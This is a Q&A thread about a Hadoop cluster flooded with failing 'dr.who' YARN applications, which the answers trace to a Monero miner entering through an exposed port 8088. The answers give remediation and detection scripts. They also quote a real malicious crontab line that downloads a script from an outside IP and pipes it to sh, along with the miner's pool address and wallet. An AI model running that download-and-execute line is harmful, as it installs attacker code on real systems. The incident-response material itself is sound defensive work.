YARN Dr.who Application Attempt appattempt fail

Posted 2019-05-16 17:15

Question:

I am getting this error message in my Hadoop cluster. Can someone explain why? Somehow more than 2000 job applications are being created and failing for no apparent reason.

Answer 1:

This might be a hack... There is a cryptocurrency miner that creates thousands of jobs like this.

On each node, check the yarn user's crontab for suspicious entries like the one below and remove them.

    $ sudo -u yarn crontab -e
    */2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
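
To review entries without opening an editor, the crontab can be listed and filtered. The following is a minimal sketch, not a complete detector: the function name `suspicious_cron_lines` is hypothetical, and it only flags lines that pipe a `wget` or `curl` download into a shell, which is the pattern shown above.

```shell
#!/usr/bin/env bash
# Print crontab lines that download something and pipe it straight into a shell.
# Reads crontab text on stdin, so it works on `crontab -l` output or a saved copy.
# (Hypothetical helper; the pattern is an assumption based on the entry above.)
suspicious_cron_lines() {
    # `|| true` keeps the exit status 0 when nothing matches.
    grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# Usage on a node (lists only, nothing is modified):
#   sudo -u yarn crontab -l | suspicious_cron_lines
```

An empty result does not prove the node is clean; a miner may use a different download method or a different user's crontab.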

Then check for a "java" process like this one and kill it.

/var/tmp/java -c /var/tmp/wc.conf
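
One way to spot such a process is to look for commands started from a temporary directory. This is a rough sketch: `procs_from_tmp` is a hypothetical helper, and it assumes input in the `pid user args` layout produced by `ps -eo pid,user,args` on Linux.

```shell
#!/usr/bin/env bash
# Print processes whose command path starts with /tmp/ or /var/tmp/.
# Expects lines in the form "PID USER COMMAND..." on stdin.
# (Hypothetical helper; the directory list is an assumption.)
procs_from_tmp() {
    awk '$3 ~ /^\/(var\/)?tmp\// { print }'
}

# Usage:
#   ps -eo pid,user,args | procs_from_tmp
```

Review the output before killing anything, since legitimate tools occasionally run from a temporary directory too.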

You should also secure all the incoming ports to your cluster to prevent this from coming back.

See also: https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html



Answer 2:

EDIT: I added some brief guidelines on how to deal with this problem in "Google Cloud Dataproc Virus CrytalMiner (dr.who)".

What is probably happening to you:

  • the hacker scans for every exposed IP address and port combination and stores them in a table of vulnerable targets
  • the hacker goes through that table and tries to figure out whether you have launched a cluster recently
  • when a vulnerable cluster is available, the hacker connects to it (everything is open and a vulnerability has been found!)
  • once connected, the hacker removes everything (in my case the script is named zz.sh, and you can find it in the BitBucket link below), then downloads the mining app
  • YARN thinks that workers are failing, but I don't think a Hadoop application is even running anymore.

I suggest you look for a Bitbucket/GitHub address in your error logs. You can also look for a get/wget/apt-get/curl command.
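
A log search along those lines might look like the sketch below. The helper name `find_download_commands` and the log path in the usage comment are assumptions; adjust them to wherever your distribution writes YARN container logs.

```shell
#!/usr/bin/env bash
# Print (with line numbers) log lines that invoke wget or curl on an http(s) URL.
# Reads the files given as arguments, or stdin when no file is given.
# (Hypothetical helper; the pattern only covers wget and curl.)
find_download_commands() {
    grep -nE '(^|[^[:alnum:]_-])(wget|curl)[[:space:]].*https?://' "$@" || true
}

# Usage (the path is an assumption, not taken from the original post):
#   find_download_commands /var/log/hadoop-yarn/*.log
```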

I guess he's rich now.

Two important things:

  • check that your security group configuration is strict enough, with no ports left open to the public
  • check that your SSH key is not compromised.

Related:

  • how-to-use-the-resourcemanager-web-interface-as-an-user
  • hdp-261-virus-crytalminer-drwho.html


Answer 3:

On Google Cloud, a bot attacks port 8088 and launches a lot of YARN applications.

  1. In Google Cloud, I added a firewall rule to block access to port 8088.
  2. Kill all the dr.who applications in YARN:

         yarn application -list | grep 'dr.who' | awk '$6 == "ACCEPTED" { print $1 }' | while read app; do yarn application -kill "$app"; done

  3. Kill all processes belonging to yarn (the previous step frees the CPU, but your network will burn out afterwards):

         ps -ef | grep yarn | awk '{ print $2 }' | while read p; do sudo kill -9 "$p"; done

Now use the console to follow YARN ;-)
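
The awk filter in step 2 splits on whitespace, so an application name containing spaces would shift the columns. A slightly more defensive sketch is shown here. It assumes that `yarn application -list` prints tab-separated, space-padded columns with the user in the fourth column; verify this against your Hadoop version. `drwho_app_ids` is a hypothetical helper name.

```shell
#!/usr/bin/env bash
# Print the IDs of applications whose user column is exactly "dr.who".
# Assumes tab-separated columns: id, name, type, user, queue, state, ...
# (Column layout is an assumption; check the output of your Hadoop version.)
drwho_app_ids() {
    awk -F'\t' '{
        # Strip the padding spaces around every field.
        for (i = 1; i <= NF; i++) gsub(/^[ ]+|[ ]+$/, "", $i)
        if ($4 == "dr.who" && $1 ~ /^application_/) print $1
    }'
}

# Usage:
#   yarn application -list -appStates ACCEPTED,RUNNING | drwho_app_ids |
#       while read -r app; do yarn application -kill "$app"; done
```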



Answer 4:

You need to edit the security group for your master and slave nodes and restrict access to port 8088, which you use to monitor YARN applications and their logs. The ResourceManager also accepts YARN applications submitted and run via its REST API; see the RM's REST API documentation for more info. The hacker uses this port to submit a YARN application that wraps a shell script, which downloads Monero mining binaries, puts them in a location such as "/var/tmp/java", and runs them. YARN thinks it is an application, but it is actually launching mining software. This is not Java, though: if you run it with the --version argument, you get the result below.

[hadoop@ip-172-31-28-26 ~]$ /var/tmp/java --version
XMRig 2.6.2
built on Jun 24 2018 with GCC 6.3.0
features: 64-bit AES

Also, if you find the file "/var/tmp/w.conf", open it and you can see the Monero pool server he is using, his wallet address, his password, etc. Below is a sample I found on my EMR instance.

{
    "algo": "cryptonight",
    "background": true,
    "donate-level": 1,
    "log-file": null,
    "print-time": 60,
    "max-cpu-usage": 95,
    "pools": [
        {
            "url": "stratum+tcp://163.172.205.136:3333",
            "user": "46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S",
            "pass": "h",
            "variant": -1
        }
    ],
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null
    }
}
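
If you want the pool endpoint from such a file, for example to search for it in firewall or flow logs, a small extraction sketch follows. `pool_urls` is a hypothetical helper, and it assumes each `"url"` entry sits on its own line as in the sample above.

```shell
#!/usr/bin/env bash
# Print the value of every "url" key found in a miner config.
# Reads the files given as arguments, or stdin when no file is given.
# (Hypothetical helper; assumes one "url" entry per line.)
pool_urls() {
    sed -n 's/.*"url"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$@"
}

# Usage:
#   pool_urls /var/tmp/w.conf
```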

To summarize, follow the steps below to take care of this issue.

  1. Remove public access to any port that is not secured, especially 8088.
  2. Check your crontab and remove any entries you don't recognize.
  3. Remove the contents of directories like "/var/tmp", but first make sure they are not yours.
  4. Use the top command to find the PIDs of the processes that are taking up all the CPU and kill them.

Following the steps above should keep the mining program from launching again.
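
To verify step 1, you can probe the ResourceManager REST API from a machine outside the cluster. This is a minimal sketch: the function names are hypothetical, the default port 8088 comes from the answers above, and the paths `/ws/v1/cluster/info` and `/ws/v1/cluster/apps` are the ResourceManager's documented REST endpoints.

```shell
#!/usr/bin/env bash
# Build the REST URL that lists applications submitted by the dr.who user.
# (Hypothetical helper; HOST is whatever address your ResourceManager uses.)
rm_drwho_apps_url() {
    local host="$1" port="${2:-8088}"
    printf 'http://%s:%s/ws/v1/cluster/apps?user=dr.who\n' "$host" "$port"
}

# Return 0 if the ResourceManager answers an unauthenticated request
# from this machine within 5 seconds, non-zero otherwise.
rm_is_reachable() {
    local host="$1" port="${2:-8088}"
    curl -s -f -o /dev/null --max-time 5 "http://${host}:${port}/ws/v1/cluster/info"
}

# Usage from OUTSIDE the cluster network (HOST is a placeholder):
#   rm_is_reachable HOST && echo "port 8088 is still exposed"
#   curl -s "$(rm_drwho_apps_url HOST)"
```

If `rm_is_reachable` succeeds from the public internet, anyone can still submit applications, and the cleanup steps will not hold.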



Tags: hadoop hdfs yarn